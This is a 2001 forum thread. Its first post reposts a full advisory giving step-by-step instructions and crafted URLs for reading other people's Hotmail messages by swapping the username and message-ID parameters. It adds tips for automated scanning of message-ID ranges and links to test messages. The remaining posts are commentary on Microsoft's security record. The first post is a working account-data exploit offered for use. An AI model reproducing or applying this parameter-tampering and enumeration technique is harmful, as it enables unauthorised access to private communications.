IMPORTANT -- Hotmail totally compromised

Post #5,857 by tseliot 8/19/01 4:32:50 PM Reply	IMPORTANT -- Hotmail totally compromised Below I include the full text of the original advisory. I recommend you and your organization(s) clear out your mailboxes and drop hotmail use completely until this issue is resolved. Hopefully by the time it is resolved, your org will have moved to a more reliable vendor. :) ### exploit lets you view e-mails from other peoples acccounts ---=[ Three Steps To View Someones Emails In Hotmail ]=--- (Tested with Internet Explorer 5) To view full email from some elses account do the following: 1. Login normally to Hotmail with your ID (any id) 2. Use this type of link to view specific message from specific user: [link\|http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN\|http://pv2fd.pav2.h...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com or [link\|http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN\|http://lw14fd.law14...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com From that link change values: MSG943322803%2e16 (Message id number, its simply a counter. %2e=.) username (Hotmail account name to view) (remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.) (remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.) 3. Done. If you entered correct message number & that user has it you will see it. :) (Test it with your own other hotmail account messages first to get the idea working.) ---=[ ideas and comments for improved viewing / scan ]--- Now typing those message numbers manually is too much work, you could create a small utility to automatically scan given range of messages from specific user name. (You need to build it to work with IE, as you must be logged in hotmail when you want to view messages..) It also helps to know that from the message numbers, in you own hotmail inbox,you can see about what time is what message number been used. eg: MSG997936971.27 arrived on 16.08.2001. MSG996698372.27 arrived on 01.08.2001. MSG975960863.0 arrived on 04.12.2000. So you dont need to scan as many message addresses when you know from which range you are looking at. (Check out Hotmail Scanner Bot aka. hobo for automatic scanning.) Test messages: (Login to hotmail,then use links to view message from my test account) raw format view: (can copy base64 encoded files too:) [link\|http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN\|http://pv2fd.pav2.h...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26raw%3d0%26login%3djokutesti99%26domain%3dhotmail%2ecom email box view: (can see any attached images directly etc.:) [link\|http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN\|http://pv2fd.pav2.h...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26login%3djokutesti99%26domain%3dhotmail%2ecom ---=[............ Research by wAwAsAn4 ..............]=--- ---=[........... wAwAsAn4@root-core.com .............]=--- ---=[................. 17.08.2001 ...................]=--- www.root-core.com == [Digital-Vortex] Webmaster www.root-core.com _____________________________________________________________ [Root-Core] - [www.root-core.com] - Free E-mail That's her, officer! That's the woman that programmed me for evil!
Post #5,859 by admin 8/19/01 4:50:06 PM Reply	"Trust your data to us" .NET :-P Regards, -scott anderson
Post #5,881 by Andrew Grygus 8/19/01 8:12:13 PM Reply	Yeah, yeah, yeah - but . . . . . [link\|http://www.aaxnet.com/news/S010819.html\|my article] includes the [link\|http://www.geekculture.com/joyoftech/joyarchives/034.html\|IMPORTANT] reason not to use Hotmail. [link\|http://www.aaxnet.com\|AAx]
Post #5,896 by ChrisR 8/19/01 8:59:50 PM Reply	The spin... ...is rather obvious: Pay your money and get Exchange. Probably why they bought hotmail - so they could screw it up and prevent it being a competitor to their server software. :-)
Post #5,939 by Ashton 8/20/01 1:25:21 AM Reply	You be so __________________baaad
Post #5,982 by tseliot 8/20/01 11:25:49 AM Reply	Hey! I was trying to keep my Diet Coke in the intake port! Now it's all out my nose... :D That's her, officer! That's the woman that programmed me for evil!
Post #6,026 by bluke 8/21/01 6:45:58 AM Reply	Interesting article about Hotmail and Microsoft Here is an interesting about Hotmail, .NET, and Microsoft. [link\|http://www.salon.com/tech/feature/2001/08/21/hotmail/index.html\|http://www.salon.co...l/index.html] Here is an interesting quote: "And instead of hurting Microsoft, Ozzie argues, Hotmail's outages, security problems and minor troubles may actually improve the company's chances of making .NET work. Solutions can be applied to more ambitious plans, "increas[ing] the probability that they'll be able to manage the more strategically important services such as HailStorm when they indeed need to roll them out," he says. ... And even if the Hotmail development process can be regarded as a training-wheels approach to .NET, that still may not be enough to ensure success, say critics. "Is sitting in a wading pool good training for the Olympic high dive?" asks Miller. "You might learn some basics like, 'Don't breathe when your head is underwater,' but you're never going to pick up the technique until you buckle down and do it right."
Post #6,212 by tablizer 8/22/01 1:31:53 AM Reply	The PHB-OS It won't be easy. Microsoft has continually "sacrificed security for default features," ....... "The needs of a commercial software enterprise such as Microsoft" -- the need to create new products that bring in revenue -- "are fundamentally at odds with the growing need for software stability,... Stability, rather than revenue growth, is often the primary goal of the programmers who are constantly improving [open source servers]. This seems to be the common theme: MS markets to PHB's, and not techies. The techies get the headaches, and the PHB's love instant icons and "seamless" services. "Seamless" as in no barriers to hackers. That is why MS does NOT sink: the PHB's are more enthralled with the gizmos than they are upset with techie complaints. MS just makes the technies look like complainers. "Come on, now, MS can't be that bad because everybody else is using it. Perhaps you just need to reboot it more, guys." MS has decided to pick making the PHB's happy, and F the techies. The PHB's sign the checks to MS, not the technies. If a hacker brakes in, MS sends a letter to the PHB telling them that the techies forgot to install the patch in time. I predict a new title: Certified Patch Integration Technician. AND, then MS gets profits from this new certification. They win either way. ________________ oop.ismad.com

Welcome to IWETHEY!